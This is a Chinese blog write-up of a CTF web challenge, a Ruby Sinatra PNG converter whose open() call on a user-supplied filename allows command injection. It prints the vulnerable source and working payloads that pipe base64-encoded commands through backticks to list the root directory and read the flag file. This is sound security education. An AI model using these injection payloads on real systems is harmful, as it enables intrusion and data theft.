2021-第五空间智能安全大赛-PNG图片转换器 | 管道符与反引号的配合、open()函数绝杀

最新推荐文章于 2023-10-07 22:57:14 发布
最新推荐文章于 2023-10-07 22:57:14 发布
阅读量1k 收藏
点赞数 1
分类专栏: web 文章标签: 安全 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55793759/article/details/127017387
版权

目录

一、原理

1、base64 -d🍺
从标准输入中读取已经进行base64编码的内容,解码输出

2、管道符 |🍺
使用此管道符"|"可以将两个命令分隔开,"|"左边命令的输出就会作为"|"右边命令的输入,此命令可连续使用

3、反引号🍺

(1)、( ` )这个字符所对应的键一般位于键盘的左上角,不要将其同单引号(’)混淆
(2)、反引号括起来的字符串被shell解释为命令行,在执行时,shell首先执行该命令行,并以它的标准输出结果取代整个反引号(包括两个反引号)部分。

4、反引号还可以嵌套使用🍺
但需注意,嵌套使用时内层的反引号必须用反斜杠(\)将其转义,例如:

$ abc=`echo The num of users is \`who| nb -l\``
$ echo $abc

二、操作过程

🍺题目给了一个.rb文件,.rb文件格式是Ruby创建的程序源代码

require 'sinatra'
require 'digest'
require 'base64'

get '/' do
  open("./view/index.html", 'r').read()
end

get '/upload' do
  open("./view/upload.html", 'r').read()
end

post '/upload' do
  unless params[:file] && params[:file][:tempfile] && params[:file][:filename] && params[:file][:filename].split('.')[-1] == 'png'
    return "<script>alert('error');location.href='/upload';</script>"
  end
  begin
    filename = Digest::MD5.hexdigest(Time.now.to_i.to_s + params[:file][:filename]) + '.png'
    open(filename, 'wb') { |f|
      f.write open(params[:file][:tempfile],'r').read()
    }
    "Upload success, file stored at #{filename}"
  rescue
    'something wrong'
  end

end

get '/convert' do
  open("./view/convert.html", 'r').read()
end

post '/convert' do
  begin
    unless params['file']
      return "<script>alert('error');location.href='/convert';</script>"
    end

    file = params['file']
    unless file.index('..') == nil && file.index('/') == nil && file =~ /^(.+)\.png$/
      return "<script>alert('dont hack me');</script>"
    end
    res = open(file, 'r').read()
    headers 'Content-Type' => "text/html; charset=utf-8"
    "var img = document.createElement(\"img\");\nimg.src= \"data:image/png;base64," + Base64.encode64(res).gsub(/\s*/, '') + "\";\n"
  rescue
    'something wrong'
  end
end

代码主要实现两个功能,分为uploadconvert两个页面,一个上传图片,一个转换图片

🍺分析代码,注意到convert功能代码调用了open()函数,尝试一下命令执行

首先随便选择个png图片上传,代码分析可以知道,返回的是加密的文件名

在这里插入图片描述
convert页面进行图片PNG转换,分析源码

res = open(file, 'r').read()
    headers 'Content-Type' => "text/html; charset=utf-8"
    "var img = document.createElement(\"img\");\nimg.src= \"data:image/png;base64," + Base64.encode64(res).gsub(/\s*/, '') + "\";\n"

可以看到,在读取到文件后,将文件进行base64加密输出

🍺可以利用这一点,将我们将需要执行的代码写入到图片中,然后执行代码,访问图片后会以base64加密的形式输出我们想要的信息,同时,需要注意,输入参数时过滤了反斜杠和进行png后缀检测

这里我们利用管道符与反引号进行payload

ls /进行base64加密后为bHMgLw==,我们将bHMgLw==输入给管道符后面,进行base64解密,反引号执行完后,第一个管道符前面没有代码,直接执行后面代码,将ls /写入图片

file=| `echo bHMgLw== | base64 -d` > cd8494ce544176f7809fdd46d67d2009.png

在这里插入图片描述
我们将ls /写入了图片中

🍺然后查看图片

在这里插入图片描述
可以看到,我们刚刚写入的代码执行了,以base64加密输出信息

🍺将得到的密文解密

在这里插入图片描述
可以看到,存在flag_2459文件

🍺然后查看该文件内容,需要将查看文件代码写入

cat /flag_2459进行base64加密后为Y2F0IC9mbGFnXzI0NTk=

file=| `echo Y2F0IC9mbGFnXzI0NTk= | base64 -d` > cd8494ce544176f7809fdd46d67d2009.png

在这里插入图片描述
🍺将代码写入图片中并访问执行

在这里插入图片描述
🍺又得到一串base64加密的密文,进行base64解密

在这里插入图片描述

得到Flag,结束!🍺
可到ctfhub上进行复盘

迷途羔羊pro
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第五空间智能安全⼤赛真题----------PNG图⽚转换器
qq_49433473的博客
05-31 492
第五空间智能安全⼤赛真题----------PNG图⽚转换器(ctfhub)
ctfhub第五空间智能安全大赛真题------PNG图片转换器--file.open漏洞--|管道
z2560088的博客
10-09 3942
linux中``引号的作用 凡是打上引号的命令,首先将引号内的命令执行一次,然后再将已经执行过的命令得到的结果再执行一次,就可以得到我们引号的输出,比如我们输入命令: `echo cat hello.txt` linux中|管道符的作用 | 管道符的作用是 把 管道符左边的的输出 当做右边命令后面待处理的结果 例如: ls -lha ~ | more|grep a >haha.txt 第五空间智能安全大赛真题----------PNG图片转换器 解题步骤: ..
2021-第五空间智能安全大赛-Web-EasyCleanup
qq_53863234的博客
12-01 1598
打开后看到源码: <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GET['mode'] == "eval"){ $shell = $_GET['shell'] ?? 'phpinfo();'; if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); eval($shell)
PNG图片转换器 ctfhub
winkPromax的博客
10-07 101
(2)、引号括起来的字符串被shell解释为命令行,在执行时,shell首先执行该命令行,并以它的标准输出结果取代整个引号(包括两个引号)部分。引号内是把传入的base64值恢复,之后通过引号执行,将输出写入图片,然后再次查看图片,用base64解码即可。使用此管道符"|"可以将两个命令分隔开,"|"左边命令的输出就会作为"|"右边命令的输入,此命令可连续使用。(1)、( ` )这个字符所对应的键一般位于键盘的左上角,不要将其同单引号(’)混淆。方法或引号(``)来执行命令)
Ruby 使用引号执行 Shell 命令并保存输出结果到变量
Looking的博客
08-29 523
Shell 命令执行结果返回 [root@master GitTest]# cat hello.txt hello world hello world hello world. I am Looking ------------------------------------------------------------ [root@master GitTest]# cat test.rb hello_world = `cat hello.txt` puts hello_world ----..
2021-信息安全与数据恢复方向竞赛-实践操作竞赛样题-第2天任务(1).docx
12-16
本资源提供了2021年全国行业职业技能竞赛第二届全国电子信息行业新技术应用职业技能大赛计算机网络管理员(信息安全与数据恢复)实践操作竞赛样题的相关信息,涵盖了竞赛的第二天任务,包括数据安全、分组对抗渗透...
图片转换工具(PNG-ICO).exe
06-11
图片格式转换工具(PNG-ICO)
png-to-hex:轻松将PNG图像转换为十六进制值批量
06-07
PNG 转十六进制轻松将 PNG 图像转换为十六进制值批次。什么该模块可能是 npm 模块的 Google Plus,但对于某些小型硬件项目、显示测试等可能非常有用。 在使用裸露的低级硬件时,我们有时希望或需要显示复杂的像素...
svg-to-png-serverless:无服务器AWS Lambda函数可将SVG转换为PNG图像
05-02
将SVG转换为PNG图像的微服务。 基于入门工具包构建,用于由在AWS Lambda上运行Headless-Chrome。 安装 然后克隆此仓库: npm install 在本地运行 通过执行SLOWMO_MS=250 npm run local ,您可以在实际查看chrome...
批量HEIC图片转换PNG转换器
最新发布
05-09
批量HEIC图片转换PNG转换器是一款Windows平台下的图片格式转换工具,它可以方便快捷地一次性将多个HEIC文件转换成PNG格式文件。每分钟大概可以转换十几个文件。 软件基于.NET Framework 4.6.1开发,使用Magick....
png-->ico图片格式转换器
10-19
一个png转ico工具推荐使用!可以从下载PNG的图标然后用这个工具转成ICO
CTFHub之文件上传
遇事不决冲冲冲
04-17 1333
MIME绕过 知识点 MIME((Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类,也就是我们抓包时常见的Content-Type。 常见的MIME类型,例如: 超文本
NSSCTF-第五空间2021-wp
F1rstb100d
09-24 1115
NSSCTF-第五空间2021-wp
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 600
[第五空间 2021] wp
『CTF Web复现』[第三届第五空间网络安全大赛]PNG图⽚转换器
Ho1aAs‘s Blog
09-18 1952
[第三届第五空间网络安全大赛]PNG图⽚转换器;利用点: Ruby File.open()命令执行
2021第五空间WEB
~airrudder~
02-24 2926
2021第五空间web部分复现
2021第五空间CTF_web_wp
meteox的博客
09-20 2202
web WebFTP 这个开始时有个1.txt直接访问,里面就有包括flag等的各种环境信息,不知道是忘删了还是有师傅导出的、、、 这个程序直接GitHub上可以找到源代码,里面有个php探针,这就可以得到各种信息了 https://github.com/wifeat/WebFTP/blob/master/Readme/mytz.php 在phpinfo中可以得到flag http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo pkloveclou
[RoarCTF 2019]Easy Calc
weixin_42346836的博客
10-16 392
查看源码发现有一个页面,直接访问 源码: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklis
图片图层隐写_【2020 “第五空间”】智能安全大赛 WP
weixin_36245388的博客
01-30 430
[MISC] loop考察点:写脚本解压缩包简单题,以前也遇到过,照着脚本修改一下就行了file解压 - > tarfile解压 - > zipfile解压 - >tarfile解压 - > zipfile解压 ...用手撸肯定不行的,咱们用pythonimport osimport tarfileimport zipfilet = 0while 1:# t记录解压次数t ...
【C#】使用fo-dicom完成BMP,JPG,PNG图片转换为DICOM文件
06-08
首先需要安装fo-dicom包,可以使用NuGet包管理器进行安装。 然后,可以使用以下代码将BMP、JPG、PNG图片转换为DICOM文件: ```csharp using System.IO; using Dicom; using Dicom.Imaging; using Dicom.Imaging.Codec; // 读取图片文件 var image = new DicomImage("path/to/image.jpg"); // 创建DICOM文件 var file = new DicomFile(); // 设置DICOM元数据 file.Dataset.Add(DicomTag.SOPClassUID, DicomUID.SecondaryCaptureImageStorage); file.Dataset.Add(DicomTag.SOPInstanceUID, DicomUID.Generate()); // 将图片数据编码为DICOM像素数据 var pixelData = PixelDataFactory.Create(image.PixelData, image.Height, image.Width, image.BitsStored, image.HighBit, image.PhotometricInterpretation); // 将像素数据添加到DICOM文件中 file.Dataset.Add(new DicomPixelData(DicomTag.PixelData, pixelData)); // 保存DICOM文件 file.Save("path/to/output.dcm"); ``` 注意:上述代码中只给出了转换JPG格式图片的示例,如果要转换其他格式的图片,需要根据具体的图片格式进行相应的解码操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值